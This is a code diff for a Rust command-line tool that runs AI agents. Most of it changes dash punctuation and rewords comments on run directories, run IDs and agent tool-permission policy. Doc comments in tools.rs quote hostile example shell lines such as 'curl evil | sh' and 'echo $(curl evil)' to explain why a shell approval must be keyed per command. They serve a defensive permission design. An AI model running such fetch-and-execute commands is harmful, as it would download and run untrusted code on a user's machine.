@@ -1361,7 +1361,7 @@ mod tests {
         assert!(path.ends_with(".leviath\\runs"));
     }
 
-    /// With no `LEVIATH_RUNS_DIR`, the runs dir must follow `LEVIATH_HOME` — the
+    /// With no `LEVIATH_RUNS_DIR`, the runs dir must follow `LEVIATH_HOME` - the
     /// same home every other leviath path resolves through. Without this, setting
     /// `LEVIATH_HOME` isolates a test's config/socket/agents dir while its runs
     /// still land in the real `~/.leviath/runs`.
@@ -1412,7 +1412,7 @@ mod tests {
         // concurrently-isolated test could own `LEVIATH_RUNS_DIR` just before
         // or after this closure's temp-env window): instead assert the helper's
         // own hash-derived path is live *inside* the closure and removed
-        // afterward -- a property no other test can perturb, since none
+        // afterward - a property no other test can perturb, since none
         // produces this exact path.
         let inside = with_isolated_runs_dir("helper-self-test", |base_dir| {
             let expected = base_dir.join("runs");
@@ -1444,7 +1444,7 @@ mod tests {
         // skip to a newline boundary, so it falls through to the `else` arm and
         // returns the whole (newline-free) tail window verbatim. Bytes are
         // written raw (never via `writeln!`, which would append '\n') so that
-        // on *every* OS the tail slice is guaranteed newline-free -- on Windows
+        // on *every* OS the tail slice is guaranteed newline-free - on Windows
         // ordinary text output is `\r\n`-terminated, which would otherwise keep
         // a '\n' in the window and take the `if` arm instead.
         let dir = tempfile::tempdir().unwrap();
@@ -1722,7 +1722,7 @@ mod tests {
     fn list_runs_empty_when_runs_dir_missing_or_empty() {
         // Isolated via `isolate_runs_dir_for_test`, so this is a genuinely
         // empty runs dir (not "the real dir, which we hope has no entry with
-        // this exact bogus id") -- can assert real emptiness instead of just
+        // this exact bogus id") - can assert real emptiness instead of just
         // absence of one specific id.
         with_isolated_runs_dir("list-runs-empty-when-runs-dir-missing-or-empty", |_d| {
             let runs = list_runs();
@@ -1759,7 +1759,7 @@ mod tests {
     fn tail_file_directory_path_returns_empty() {
         // metadata() and File::open() both succeed on a directory (confirmed
         // empirically on macOS/Linux); it's read_to_end() that fails with
-        // "Is a directory" -- and that error is deliberately discarded (`let
+        // "Is a directory" - and that error is deliberately discarded (`let
         // _ = file.read_to_end(&mut buf);`), so this exercises the
         // graceful-empty-buffer fallback at the bottom of the function, not
         // either of the two `Err(_) => return String::new()` early returns.
@@ -1772,7 +1772,7 @@ mod tests {
     fn tail_file_open_permission_denied_returns_empty() {
         // A file with no permissions at all: `Path::exists()`/`fs::metadata()`
         // only need search (execute) permission on the *parent* directories
-        // to stat a path, not read permission on the file itself -- so both
+        // to stat a path, not read permission on the file itself - so both
         // succeed here. `std::fs::File::open()` in read mode, however,
         // genuinely fails with `PermissionDenied`. Unlike the metadata-error
         // arm (only reachable via a delete-between-calls race), this is a
@@ -2109,7 +2109,7 @@ mod tests {
 
     /// A run dir whose metadata can't be parsed still gets terminated. Such a run
     /// is skipped by `list_runs`, so leaving it alone makes it both invisible and
-    /// permanent — the one state from which there is no way back.
+    /// permanent - the one state from which there is no way back.
     #[test]
     fn force_cancel_writes_a_record_over_unreadable_metadata() {
         let base = tempfile::tempdir().unwrap();
@@ -2124,7 +2124,7 @@ mod tests {
         assert!(meta.error.is_some(), "records why it was synthesized");
     }
 
-    /// A directory that exists but can't be written still counts as "found" — the
+    /// A directory that exists but can't be written still counts as "found" - the
     /// caller must not report "no such run" for a run that plainly exists.
     #[test]
     fn force_cancel_reports_a_write_failure_but_still_found_the_run() {

--- a/crates/leviath-cli/src/runstate.rs
+++ b/crates/leviath-cli/src/runstate.rs
@@ -93,10 +93,10 @@ fn now_secs() -> i64 {
 ///
 /// The fallback resolves through [`crate::config::leviath_home_dir`], not
 /// `dirs::home_dir` directly, so `LEVIATH_HOME` redirects the runs dir like it
-/// redirects the config, the control socket and the agents dir. It used to use
-/// `dirs::home_dir` alone, which meant a test that set `LEVIATH_HOME` was
-/// isolated everywhere *except* here and still wrote runs into the developer's
-/// real `~/.leviath/runs`. `LEVIATH_RUNS_DIR` still wins over both.
+/// redirects the config, the control socket and the agents dir. With the raw
+/// OS home instead, a test that sets `LEVIATH_HOME` would be isolated
+/// everywhere *except* here and still write runs into the developer's real
+/// `~/.leviath/runs`. `LEVIATH_RUNS_DIR` wins over both.
 fn runs_dir_from(env_override: Option<&str>) -> PathBuf {
     if let Some(dir) = env_override {
         return PathBuf::from(dir);
@@ -228,15 +228,15 @@ const RUN_ID_ENTROPY_BITS: u32 = 48;
 
 /// Generate a unique run ID: `<agent_name>-<timestamp>-<random>`.
 ///
-/// The suffix is **random**, not derived. It used to be
-/// `(now ^ (now >> 16) ^ counter)` over a process-local counter, which defended
-/// a `lev run --count N` batch inside one process but degenerated to a pure
+/// The suffix is **random**, not derived. A derived suffix like
+/// `(now ^ (now >> 16) ^ counter)` over a process-local counter defends a
+/// `lev run --count N` batch inside one process but degenerates to a pure
 /// function of the current second across separate processes: three concurrent
-/// `lev run` invocations all minted `fetcher-1785127214-8b48` and silently shared
+/// `lev run` invocations all mint `fetcher-1785127214-8b48` and silently share
 /// one run directory. Nothing downstream detects that - `create_dir_all` is a
-/// no-op on an existing directory and the persistence worker then last-writer-wins
-/// over `meta.json` / `context.json` / `run.lvr`, interleaving two runs'
-/// state irrecoverably.
+/// no-op on an existing directory and the persistence worker then
+/// last-writer-wins over `meta.json` / `context.json` / `run.lvr`, interleaving
+/// two runs' state irrecoverably.
 ///
 /// The `<name>-<secs>-<hex>` shape is preserved: the timestamp keeps IDs sorting
 /// and reading chronologically, and the dashboard's short-ID display
@@ -970,11 +970,11 @@ mod tests {
 
     #[test]
     fn new_run_id_suffix_is_random_not_derived_from_the_clock() {
-        // The collision this guards against was *across processes*: the suffix
-        // used to be `(now ^ (now >> 16) ^ counter)` over a process-local
-        // counter that every new process starts at 0, so it degenerated to a
-        // pure function of the current second. Three concurrent `lev run`
-        // invocations all minted `fetcher-1785127214-8b48` and silently shared
+        // The collision this guards against is *across processes*: a suffix
+        // derived as `(now ^ (now >> 16) ^ counter)` over a process-local
+        // counter that every new process starts at 0 degenerates to a pure
+        // function of the current second. Three concurrent `lev run`
+        // invocations all mint `fetcher-1785127214-8b48` and silently share
         // one run directory. A fresh process has no state to vary, so the
         // property that has to hold is: IDs that share a timestamp still differ.
         let ids: Vec<String> = (0..200).map(|_| new_run_id("same-agent")).collect();
@@ -1314,9 +1314,9 @@ mod tests {
     }
 
     /// With no `LEVIATH_DASHBOARD_LOG_PATH`, the dashboard log must follow
-    /// `LEVIATH_HOME` like every other data path. It resolved through the raw
-    /// OS home before, so a fully isolated test session still appended to the
-    /// developer's real `~/.leviath/dashboard.log`.
+    /// `LEVIATH_HOME` like every other data path. Resolving through the raw
+    /// OS home would leave a fully isolated test session still appending to
+    /// the developer's real `~/.leviath/dashboard.log`.
     #[test]
     fn dashboard_log_path_honors_leviath_home() {
         temp_env::with_vars(

--- a/crates/leviath-cli/src/test_support.rs
+++ b/crates/leviath-cli/src/test_support.rs
@@ -89,7 +89,7 @@ conversation = { kind = "sliding_window", max_items = 40, max_tokens = 20000 }
 }
 
 /// A self-contained blueprint whose stage 0 (`plan`) is an `interactive_points`
-/// stage with a `plan_approval` interaction point — for recovery tests that
+/// stage with a `plan_approval` interaction point - for recovery tests that
 /// resume a run parked at an interaction point. Self-contained for the same
 /// isolation reason as [`inline_coder_manifest`].
 #[cfg(test)]

--- a/crates/leviath-cli/src/tools.rs
+++ b/crates/leviath-cli/src/tools.rs
@@ -61,7 +61,7 @@ impl ToolRegistry {
                 {
                     Ok(header) => header,
                     Err(e) => {
-                        tracing::warn!(server = %server_cfg.name, error = %e, "MCP auth unavailable — skipping");
+                        tracing::warn!(server = %server_cfg.name, error = %e, "MCP auth unavailable - skipping");
                         continue;
                     }
                 };
@@ -117,7 +117,7 @@ impl ToolRegistry {
                         let _enter = span.enter();
                         span.record("server", tracing::field::display(&server_cfg.name));
                         span.record("error", tracing::field::display(&e));
-                        tracing::warn!("Failed to connect MCP server — skipping");
+                        tracing::warn!("Failed to connect MCP server - skipping");
                     }
                 }
             }
@@ -151,7 +151,7 @@ impl ToolRegistry {
 }
 
 /// Current Unix time in seconds, for token-expiry checks. `0` if the clock is
-/// somehow before the epoch — which reads every token as expired and forces a
+/// somehow before the epoch - which reads every token as expired and forces a
 /// refresh attempt, the safe direction.
 pub(crate) fn unix_now_secs() -> u64 {
     std::time::SystemTime::now()
@@ -212,7 +212,7 @@ pub fn default_tool_policy(tool_name: &str, is_builtin: bool) -> ToolPolicy {
         // through this function at all is the *config*, not the prompt.
         //
         // They used to skip policy resolution entirely, so a user's
-        // `[tool_permissions] spawn_agent = "deny"` was silently ignored — the
+        // `[tool_permissions] spawn_agent = "deny"` was silently ignored - the
         // "a configured deny is terminal" guarantee did not cover these five
         // names. That is the hole worth closing, and it is closed by being here.
         //
@@ -226,7 +226,7 @@ pub fn default_tool_policy(tool_name: &str, is_builtin: bool) -> ToolPolicy {
         "spawn_agent" | "check_agent" | "wait_for_agent" | "send_to_agent" | "kill_agent" => {
             ToolPolicy::Allow
         }
-        // These tools ARE the human-in-the-loop mechanism — gating them behind
+        // These tools ARE the human-in-the-loop mechanism - gating them behind
         // a separate tool-approval prompt would mean asking the user "may I
         // ask you something?" before actually asking them.
         "ask_user_text" | "ask_user_choice" | "ask_user_confirm" | "edit_document" => {
@@ -260,8 +260,8 @@ fn stricter(a: ToolPolicy, b: ToolPolicy) -> ToolPolicy {
 
 /// Resolve the effective policy for a tool call.
 ///
-/// Scope order is narrowest-first — stage, then agent, then the user's global
-/// config, then the built-in default — but *narrower does not mean stronger*.
+/// Scope order is narrowest-first - stage, then agent, then the user's global
+/// config, then the built-in default - but *narrower does not mean stronger*.
 /// The stage and agent layers come out of `agent.leviath`, which for any agent
 /// installed with `lev add` is a file the user downloaded. So a blueprint may
 /// only ever **tighten** what the user configured, never loosen it: whatever the
@@ -270,12 +270,12 @@ fn stricter(a: ToolPolicy, b: ToolPolicy) -> ToolPolicy {
 ///
 /// Only an *explicitly configured* global entry acts as a ceiling. A tool the
 /// user has said nothing about falls through to [`default_tool_policy`], and a
-/// blueprint is free to set it — otherwise no shipped agent could pre-approve
+/// blueprint is free to set it - otherwise no shipped agent could pre-approve
 /// its own tools (the researcher's `web_fetch = "allow"` would stop working) and
 /// the model would become a wall rather than a floor.
 ///
 /// A user who wants to grant one specific agent more than their global setting
-/// says so in their own config, keyed by agent name — see
+/// says so in their own config, keyed by agent name - see
 /// [`crate::config::Config::permissions_for_agent`], which is folded into
 /// `global_permissions` at spawn.
 ///
@@ -307,7 +307,7 @@ pub fn resolve_policy(
         (None, None) => default_tool_policy(tool_name, is_builtin),
     };
 
-    // A `Deny` is terminal — no launch flag lifts it.
+    // A `Deny` is terminal - no launch flag lifts it.
     if configured == ToolPolicy::Deny {
         return ToolPolicy::Deny;
     }
@@ -324,7 +324,7 @@ pub fn resolve_policy(
 ///
 /// Session approval used to key on the bare tool name, so approving one `shell`
 /// call approved *every* later `shell` call for the run. "Allow `ls` for this
-/// session" silently became "allow `curl evil | sh` for this session" — the user
+/// session" silently became "allow `curl evil | sh` for this session" - the user
 /// consented to one thing and granted another.
 ///
 /// So a shell approval is keyed on what actually runs: for each command in the
@@ -336,7 +336,7 @@ pub fn resolve_policy(
 /// Chained commands are split rather than refused. The first version returned
 /// `None` for anything containing `&&`, `|`, `;`, `$(` or a redirect, on the
 /// grounds that the leading words of `foo && curl evil` do not characterize it.
-/// True — but a coding agent writes compound commands constantly, and in a real
+/// True - but a coding agent writes compound commands constantly, and in a real
 /// run *every* shell call it made was compound, so "allow for this session"
 /// never once applied and the user re-approved the same work over and over.
 /// Splitting keeps the security property (`curl` is its own key, and is not
@@ -373,7 +373,7 @@ pub fn session_approval_keys(tool_name: &str, arguments: &serde_json::Value) -> 
 /// (`>`, `<`) ends the part that names a program, and what follows is a
 /// filename rather than a command, so it is dropped. Command substitution
 /// (`$(...)`, backticks) runs a command whose text is *inside* the current one,
-/// so its contents are lifted out and treated as their own segments — otherwise
+/// so its contents are lifted out and treated as their own segments - otherwise
 /// `echo $(curl evil)` would grant only `echo`.
 ///
 /// Returns empty when the line cannot be read this way, which is the signal to
@@ -389,11 +389,11 @@ fn command_segments(command: &str) -> Vec<String> {
 
     // `str::get` rather than `&s[a..b]` throughout: the workspace denies raw
     // string slicing (a non-boundary index panics), and here every `None` has
-    // the same honest answer — a line we cannot read is one we will not grant.
+    // the same honest answer - a line we cannot read is one we will not grant.
     while let Some((before, after_open)) = rest.split_once("$(") {
         current.push_str(before);
         let Some((inner, after)) = split_at_matching_paren(after_open) else {
-            return Vec::new(); // unbalanced — not a line we can read
+            return Vec::new(); // unbalanced - not a line we can read
         };
         // The substituted command is its own segment (recursively).
         segments.extend(command_segments(inner));
@@ -424,7 +424,7 @@ fn command_segments(command: &str) -> Vec<String> {
 /// command, and everything after the paren. `None` when it is unbalanced.
 ///
 /// Returns the two halves rather than an index so the caller never does its own
-/// slicing — the workspace denies raw string indexing, and an `Option` per index
+/// slicing - the workspace denies raw string indexing, and an `Option` per index
 /// would add branches that cannot be taken (a `char_indices` offset is always a
 /// boundary) and so could never be covered.
 fn split_at_matching_paren(s: &str) -> Option<(&str, &str)> {
@@ -452,7 +452,7 @@ fn split_at_matching_paren(s: &str) -> Option<(&str, &str)> {
 /// makes the grant useless: `echo "exit code: $?"` and `echo "done"` would be
 /// two different grants for the same harmless program, and a run full of
 /// progress `echo`s would re-prompt on every one. A path-like or bare word stays
-/// in the key — `python3 test.py` should not grant `python3 evil.py`.
+/// in the key - `python3 test.py` should not grant `python3 evil.py`.
 fn command_prefix(command: &str) -> Option<String> {
     let mut words = command.split_whitespace();
     let program = words.next()?;
@@ -485,7 +485,7 @@ mod mcp_registry_tests {
     // A minimal MCP server speaking just enough JSON-RPC over stdio to
     // satisfy `initialize` / `notifications/initialized` / `tools/list`,
     // mirroring `leviath-mcp/src/discovery.rs`'s own `STUB_INIT_AND_LIST`
-    // test fixture -- a real (but fast, local, no-network) subprocess round
+    // test fixture - a real (but fast, local, no-network) subprocess round
     // trip rather than a fake/mocked `ToolExecutor`.
     const STUB_INIT_AND_LIST: &str = r#"
 import sys, json
@@ -674,7 +674,7 @@ for line in sys.stdin:
     #[tokio::test]
     async fn build_skips_mcp_server_that_fails_to_connect() {
         // A nonexistent command fails to spawn, exercising the `Err(e)` arm
-        // ("Failed to connect MCP server -- skipping") instead of the
+        // ("Failed to connect MCP server - skipping") instead of the
         // success arm above.
         with_tracing(|| {});
         let registry = with_temp_home(|| async {
@@ -721,7 +721,7 @@ for line in sys.stdin:
     }
 
     /// A locked keychain costs the MCP servers that need OAuth, not every tool
-    /// the agent has -- so the read path warns and carries on.
+    /// the agent has - so the read path warns and carries on.
     #[test]
     fn an_unreachable_credential_store_warns_rather_than_failing_tool_setup() {
         assert!(
@@ -772,7 +772,7 @@ mod policy_tests {
 
     #[test]
     fn test_default_policy_ask_user_tools_allow_by_default() {
-        // These tools ARE the human-in-the-loop mechanism — they must not
+        // These tools ARE the human-in-the-loop mechanism - they must not
         // require a separate approval prompt before asking the user.
         assert_eq!(
             default_tool_policy("ask_user_text", true),
@@ -844,7 +844,7 @@ mod policy_tests {
     /// downloaded; letting its `[stages.x.tool_permissions]` overrule the user's
     /// own `[tool_permissions]` meant an installed agent could self-grant the
     /// shell the user had explicitly denied. (This test previously asserted the
-    /// opposite — that stage "beats" global — which is the bug, not the design.)
+    /// opposite - that stage "beats" global - which is the bug, not the design.)
     #[test]
     fn test_resolve_policy_stage_cannot_loosen_global() {
         let mut stage = HashMap::new();
@@ -863,7 +863,7 @@ mod policy_tests {
     }
 
     /// The ceiling is only what the user *explicitly* configured. A tool they
-    /// have said nothing about is still the blueprint's to set — otherwise the
+    /// have said nothing about is still the blueprint's to set - otherwise the
     /// shipped researcher agent could not pre-approve its own `web_fetch`.
     #[test]
     fn test_resolve_policy_blueprint_free_when_user_silent() {
@@ -919,7 +919,7 @@ mod policy_tests {
         assert_eq!(policy, ToolPolicy::Deny);
     }
 
-    /// A blueprint's own `deny` is terminal too — an agent that declares it
+    /// A blueprint's own `deny` is terminal too - an agent that declares it
     /// never needs a tool doesn't get handed it by an unattended `--yolo`.
     #[test]
     fn test_yolo_does_not_override_blueprint_deny() {
@@ -998,7 +998,7 @@ mod policy_tests {
         assert_eq!(policy, ToolPolicy::Deny);
     }
 
-    /// A global `ask` still bounds a blueprint's `allow` — the user gets their
+    /// A global `ask` still bounds a blueprint's `allow` - the user gets their
     /// prompt rather than silent execution.
     #[test]
     fn test_resolve_policy_global_ask_bounds_blueprint_allow() {
@@ -1177,8 +1177,8 @@ mod policy_tests {
         assert_ne!(keys("git diff HEAD~1"), keys("git push --force"));
     }
 
-    /// A flag does not narrow what the program is, so it is not part of the key
-    /// — otherwise `ls -la` and `ls -l` would prompt separately for no benefit.
+    /// A flag does not narrow what the program is, so it is not part of the key -
+    /// otherwise `ls -la` and `ls -l` would prompt separately for no benefit.
     #[test]
     fn flags_are_not_part_of_the_prefix() {
         assert_eq!(keys("cargo test --lib"), ["shell:cargo test"]);
@@ -1188,7 +1188,7 @@ mod policy_tests {
 
     /// A compound line grants one key per command in it. The first version
     /// refused these outright, and in a real run *every* shell call a coding
-    /// agent made was compound — so "allow for this session" never once applied
+    /// agent made was compound - so "allow for this session" never once applied
     /// and the same work was re-approved over and over.
     #[test]
     fn a_compound_line_grants_each_command_in_it() {
@@ -1245,7 +1245,7 @@ mod policy_tests {
         assert!(nested.iter().any(|k| k == "shell:whoami"), "{nested:?}");
     }
 
-    /// A redirect names a file, not a program — `> /tmp/out` must not become a
+    /// A redirect names a file, not a program - `> /tmp/out` must not become a
     /// key, and must not stop the command before it from being one.
     #[test]
     fn a_redirect_target_is_not_a_command() {
@@ -1327,7 +1327,7 @@ mod policy_tests {
         assert_eq!(policy, ToolPolicy::Allow);
     }
 
-    /// It does not outrank a stage's `deny` — see
+    /// It does not outrank a stage's `deny` - see
     /// `test_yolo_does_not_override_blueprint_deny` for the rationale.
     #[test]
     fn test_resolve_policy_launch_cannot_override_stage_deny() {
@@ -1613,7 +1613,7 @@ mod policy_tests {
 
     // ─── resolve_policy full chain: all four levels present ───────────────
 
-    /// With every level saying `deny`, nothing lifts it — not the stage, not the
+    /// With every level saying `deny`, nothing lifts it - not the stage, not the
     /// agent, not `--allow`. Previously this asserted `Allow`, i.e. that a launch
     /// flag beat a unanimous deny.
     #[test]

--- a/crates/leviath-cli/src/tools.rs
+++ b/crates/leviath-cli/src/tools.rs
@@ -211,17 +211,18 @@ pub fn default_tool_policy(tool_name: &str, is_builtin: bool) -> ToolPolicy {
         // The sub-agent tools default to `Allow`, and the point of routing them
         // through this function at all is the *config*, not the prompt.
         //
-        // They used to skip policy resolution entirely, so a user's
-        // `[tool_permissions] spawn_agent = "deny"` was silently ignored - the
-        // "a configured deny is terminal" guarantee did not cover these five
-        // names. That is the hole worth closing, and it is closed by being here.
+        // If they skipped policy resolution entirely, a user's
+        // `[tool_permissions] spawn_agent = "deny"` would be silently ignored -
+        // the "a configured deny is terminal" guarantee would not cover these
+        // five names. That is the hole worth closing, and it is closed by being
+        // here.
         //
         // Defaulting them to `Ask` instead would change what working agents do:
         // every fan-out would stop on a prompt, and an unattended run would
         // block on an approval nothing is there to give. `spawn_agent` can only
         // name an agent the user installed, the tree is depth-capped, and
-        // children inherit `--no-seed-commands`, so the default keeps the
-        // behaviour that existed while making the user's own setting count. Set
+        // children inherit `--no-seed-commands`, so the `Allow` default keeps
+        // working agents working while making the user's own setting count. Set
         // `spawn_agent = "ask"` to be prompted.
         "spawn_agent" | "check_agent" | "wait_for_agent" | "send_to_agent" | "kill_agent" => {
             ToolPolicy::Allow
@@ -322,10 +323,10 @@ pub fn resolve_policy(
 /// The keys a session-scoped approval ("allow for this session") is remembered
 /// under. Empty means this call must not be session-granted at all.
 ///
-/// Session approval used to key on the bare tool name, so approving one `shell`
-/// call approved *every* later `shell` call for the run. "Allow `ls` for this
-/// session" silently became "allow `curl evil | sh` for this session" - the user
-/// consented to one thing and granted another.
+/// Keying session approval on the bare tool name would make approving one
+/// `shell` call approve *every* later `shell` call for the run. "Allow `ls` for
+/// this session" silently becomes "allow `curl evil | sh` for this session" -
+/// the user consents to one thing and grants another.
 ///
 /// So a shell approval is keyed on what actually runs: for each command in the
 /// line, its leading words. `git diff HEAD~1` grants `git diff`,
@@ -842,9 +843,9 @@ mod policy_tests {
 
     /// ...but it may NOT loosen it. `agent.leviath` is a file the user
     /// downloaded; letting its `[stages.x.tool_permissions]` overrule the user's
-    /// own `[tool_permissions]` meant an installed agent could self-grant the
-    /// shell the user had explicitly denied. (This test previously asserted the
-    /// opposite - that stage "beats" global - which is the bug, not the design.)
+    /// own `[tool_permissions]` would let an installed agent self-grant the
+    /// shell the user had explicitly denied. (A test asserting the opposite -
+    /// that stage "beats" global - codifies the bug, not the design.)
     #[test]
     fn test_resolve_policy_stage_cannot_loosen_global() {
         let mut stage = HashMap::new();
@@ -1614,8 +1615,8 @@ mod policy_tests {
     // ─── resolve_policy full chain: all four levels present ───────────────
 
     /// With every level saying `deny`, nothing lifts it - not the stage, not the
-    /// agent, not `--allow`. Previously this asserted `Allow`, i.e. that a launch
-    /// flag beat a unanimous deny.
+    /// agent, not `--allow`. Asserting `Allow` here would mean a launch flag
+    /// beats a unanimous deny.
     #[test]
     fn test_resolve_policy_full_chain_deny_is_terminal() {
         let mut launch = HashMap::new();

--- a/crates/leviath-cli/src/tui/mod.rs
+++ b/crates/leviath-cli/src/tui/mod.rs
@@ -104,7 +104,7 @@ mod test_doubles {
     /// The crate's single test [`EventSource`]. Two modes, both reachable from
     /// one type:
     /// - scripted: yields a fixed sequence (one `Option<Event>` per
-    ///   `poll_event` call -- `Some(e)` -> `Ok(Some(e))`, `None` -> `Ok(None)`,
+    ///   `poll_event` call - `Some(e)` -> `Ok(Some(e))`, `None` -> `Ok(None)`,
     ///   i.e. a simulated poll-timeout tick), then `None` forever once
     ///   exhausted.
     /// - failing (`fail = true`): every `poll_event` returns `Err`, to drive a
@@ -240,7 +240,7 @@ mod test_doubles {
 
     /// Test [`TerminalSetup`]: a [`TestBackendHarness`] terminal and no-op TTY
     /// operations, so a UI's generic core monomorphizes only over test doubles
-    /// in the measured test build -- never over the real `CrosstermBackend`,
+    /// in the measured test build - never over the real `CrosstermBackend`,
     /// which can't be driven under `cargo test`. The two `_should_fail` flags
     /// drive the `setup.enable()?` and `setup.create_terminal()?` failure arms
     /// deterministically.

--- a/crates/leviath-cli/src/tui/theme.rs
+++ b/crates/leviath-cli/src/tui/theme.rs
@@ -1,10 +1,10 @@
 //! Color palette, glyph constants, and spinner frames shared by every Leviath
 //! terminal UI (`lev dash`, the `lev setup` wizard, and the markdown renderer).
 //!
-//! These used to live in `commands/dashboard/theme.rs` as `pub(super)` consts,
-//! with a second hand-copied palette in `render.rs`. Two surfaces drifting apart
-//! is a real cost the moment a third one exists, so the single definition lives
-//! here and the old paths re-export it.
+//! This is the single definition: `commands/dashboard/theme` is an alias of
+//! this module and `render.rs` imports from here, rather than each surface
+//! carrying its own hand-copied palette. Two surfaces drifting apart is a real
+//! cost the moment a third one exists.
 
 use ratatui::style::Color;
 

--- a/crates/leviath-cli/tests/cli_dispatch.rs
+++ b/crates/leviath-cli/tests/cli_dispatch.rs
@@ -9,7 +9,7 @@
 //! `remove <name>`, `test <path> --dry-run`, and `pack <local-dir>`.
 //!
 //! This deliberately never spawns `dash`/`dashboard`, `run` (foreground),
-//! `serve`, or `__run-worker` — those touch real terminal/TTY/stdin/
+//! `serve`, or `__run-worker` - those touch real terminal/TTY/stdin/
 //! subprocess state and are intentionally left untested via real process
 //! spawns elsewhere in this codebase for safety reasons. It also never
 //! spawns `setup` without `--non-interactive` (blocks on real stdin), nor
@@ -42,7 +42,7 @@ fn workspace_root() -> PathBuf {
 ///
 /// Sets `HOME`, `USERPROFILE`, AND `LEVIATH_HOME`: `dirs::home_dir()` does
 /// not read *any* environment variable on macOS (`NSHomeDirectory()`) or
-/// Windows (`SHGetKnownFolderPath`) -- confirmed via real Windows CI
+/// Windows (`SHGetKnownFolderPath`) - confirmed via real Windows CI
 /// failures in `add`/`remove` even after overriding `HOME`+`USERPROFILE`.
 /// `LEVIATH_HOME` (`crate::config::leviath_home_dir()`, and a matching
 /// local override inside `leviath-package`'s `AgentInstaller::new()`) is
@@ -102,7 +102,7 @@ fn list_subcommand_dispatches_and_exits_zero() {
 #[test]
 fn verbose_flag_selects_debug_log_level_and_still_dispatches() {
     // Drives `main`'s `let level = if cli.verbose { "debug" } else { "info" };`
-    // `true` arm for real -- every other test here omits `--verbose`, so
+    // `true` arm for real - every other test here omits `--verbose`, so
     // that arm was otherwise never exercised. `list` is a safe, ordinary
     // subcommand to pair it with.
     let tmp = tempfile::tempdir().unwrap();
@@ -162,7 +162,7 @@ fn validate_subcommand_dispatches_and_exits_zero_for_valid_manifest() {
 // ─── create ────────────────────────────────────────────────────────────
 //
 // `lev create <name>` only does local filesystem writes (creates a
-// directory + a few files under the current directory) -- no network, no
+// directory + a few files under the current directory) - no network, no
 // interactivity. Safe to spawn for real with `current_dir` pinned to the
 // isolated tmpdir (see `lev_command`).
 
@@ -183,7 +183,7 @@ fn create_subcommand_dispatches_and_exits_zero() {
 
 // ─── setup --non-interactive ────────────────────────────────────────────
 //
-// `lev setup --non-interactive` never touches stdin -- it only applies the
+// `lev setup --non-interactive` never touches stdin - it only applies the
 // given flag values and saves to `Config::config_path()`, which is
 // redirected to the isolated `LEVIATH_CONFIG_PATH` by `lev_command`. The
 // plain interactive path (real stdin prompts) is deliberately never
@@ -213,7 +213,7 @@ fn setup_non_interactive_subcommand_dispatches_and_exits_zero() {
 // ─── add (local directory) ──────────────────────────────────────────────
 //
 // `lev add <local-dir>` copies a plain agent directory into
-// `<HOME>/.leviath/agents/<name>` -- no network call. `HOME` is redirected
+// `<HOME>/.leviath/agents/<name>` - no network call. `HOME` is redirected
 // to the isolated tmpdir by `lev_command`, so this never touches the real
 // `~/.leviath`. Only the local-path variant is exercised; a bare package
 // name would fall through to the registry-installation branch, which makes
@@ -250,7 +250,7 @@ fn add_subcommand_installs_from_local_directory_and_exits_zero() {
 // ─── remove ──────────────────────────────────────────────────────────────
 //
 // `remove_agent` has no interactive confirmation prompt (see
-// `commands/remove.rs`) -- it just verifies the agent is installed and
+// `commands/remove.rs`) - it just verifies the agent is installed and
 // deletes its directory. Installs a fixture agent first (via `add`) into
 // the isolated `HOME`, then removes it with the same isolated environment.
 
@@ -287,7 +287,7 @@ fn remove_subcommand_removes_installed_agent_and_exits_zero() {
 //
 // The `agents/coder` fixture has no `tests/` directory, so `execute()`
 // returns early (prints "No tests directory found") before ever calling
-// `Config::load()` or building a provider registry -- no network calls are
+// `Config::load()` or building a provider registry - no network calls are
 // possible on this path regardless of `--dry-run`. Pass `--dry-run` anyway
 // for defense in depth in case the fixture ever grows a `tests/` dir.
 
@@ -310,7 +310,7 @@ fn test_subcommand_dry_run_dispatches_and_exits_zero() {
 // ─── pack ────────────────────────────────────────────────────────────────
 //
 // `lev pack <local-dir>` bundles a local agent directory into a
-// `.leviath-bundle` archive on disk -- no network, no interactivity.
+// `.leviath-bundle` archive on disk - no network, no interactivity.
 
 #[test]
 fn pack_subcommand_dispatches_and_exits_zero() {

--- a/crates/leviath-cli/tests/manifest_integration.rs
+++ b/crates/leviath-cli/tests/manifest_integration.rs
@@ -39,7 +39,7 @@ fn all_builtin_agents_parse_successfully() {
     let manifests = discover_agent_manifests();
     assert!(
         !manifests.is_empty(),
-        "No agent manifests found — check agents/ directory"
+        "No agent manifests found - check agents/ directory"
     );
 
     for (name, path) in &manifests {
@@ -138,8 +138,8 @@ fn specific_agent_coder_has_expected_structure() {
 /// A `required` region the AGENT is expected to fill is enforced at runtime by
 /// `require_context_regions`, which re-runs the stage with a nudge until the
 /// region has content. But `unmet_required_regions` returns EMPTY for a stage
-/// with no context-writing tool — gating a stage that *can't* populate the
-/// region would loop pointlessly — so a blueprint that marks a region `required`
+/// with no context-writing tool - gating a stage that *can't* populate the
+/// region would loop pointlessly - so a blueprint that marks a region `required`
 /// while giving no stage `context_write`/`context_append` gets a gate that
 /// silently does nothing, and the region stays blank with no error.
 ///
@@ -178,7 +178,7 @@ fn agent_written_required_regions_have_a_stage_that_can_write_them() {
         assert!(
             !writers.is_empty(),
             "agent '{name}' marks {agent_written:?} required but no stage has \
-             context_write/context_append — the required-region gate is a no-op \
+             context_write/context_append - the required-region gate is a no-op \
              and the region silently stays empty"
         );
     }
@@ -206,7 +206,7 @@ fn required_regions_are_not_also_seeded_from_the_environment() {
             assert!(
                 !environmental,
                 "agent '{name}' region '{}' is required AND seeded from the \
-                 environment — a missing file or failing command would fail the \
+                 environment - a missing file or failing command would fail the \
                  spawn outright",
                 region.name
             );
@@ -234,7 +234,7 @@ fn specific_agent_researcher_has_graph_transitions() {
 ///   1. every agent declares an explicit `conversation` SlidingWindow region
 ///      (an auto-added one is dropped on the first stage transition);
 ///   2. no tool-routing target is a SlidingWindow OTHER than `conversation`
-///      (only `conversation` may hold ToolResult message blocks — a routed
+///      (only `conversation` may hold ToolResult message blocks - a routed
 ///      result elsewhere desyncs from its tool_use → Anthropic 400);
 ///   3. every Compacting region has a paired CompactHistory region.
 #[test]
@@ -329,7 +329,7 @@ fn all_builtin_stuck_edges_are_armed_and_bounded() {
                 assert!(
                     bp.find_stage(target)
                         .is_some_and(|s| s.max_revisits.is_some()),
-                    "agent '{name}' stage '{}': stuck edge → '{target}' is unbounded — \
+                    "agent '{name}' stage '{}': stuck edge → '{target}' is unbounded - \
                      '{target}' needs max_revisits or the two can ping-pong all run",
                     stage.name
                 );
@@ -342,7 +342,7 @@ fn all_builtin_stuck_edges_are_armed_and_bounded() {
